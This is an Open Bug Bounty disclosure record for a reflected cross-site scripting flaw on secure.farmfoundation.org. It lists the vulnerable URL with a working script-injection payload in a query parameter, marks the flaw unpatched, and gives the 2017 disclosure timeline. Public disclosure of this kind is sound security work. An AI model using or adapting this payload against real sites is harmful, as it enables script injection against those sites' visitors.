secure.farmfoundation.org XSS vulnerability

2017-06-2709:42:00

keritzy

www.openbugbounty.org

JSON

Vulnerable URL:

https://secure.farmfoundation.org/np/clients/farmfoundation/tellFriend.jsp?subject=Attending%20Soil%20Renaissance%20Newsletter%20Registration&url;=/%27%22--!%3E%20%3Cimg%20src=x%20onerror=alert(%22openbugbounty%22)%3E

Details:

Description	Value
Patched:	No
Latest check for patch:	30.07.2017
Vulnerability type:	XSS
Vulnerability status:	Publicly disclosed
Alexa Rank	Unknown / Not calculated
VIP website status:	No
Check secure.farmfoundation.org SSL connection:	(Grade: A+)

Coordinated Disclosure Timeline:

Description	Value
Vulnerability submitted via Open Bug Bounty	27 June, 2017 09:42 GMT
Generic security notifications sent to website owner	28 June, 2017 07:28 GMT
Notification sent to subscribers (without technical details)	28 June, 2017 10:17 GMT
Vulnerability details disclosed by researcher	5 July, 2017 08:15 GMT

JSON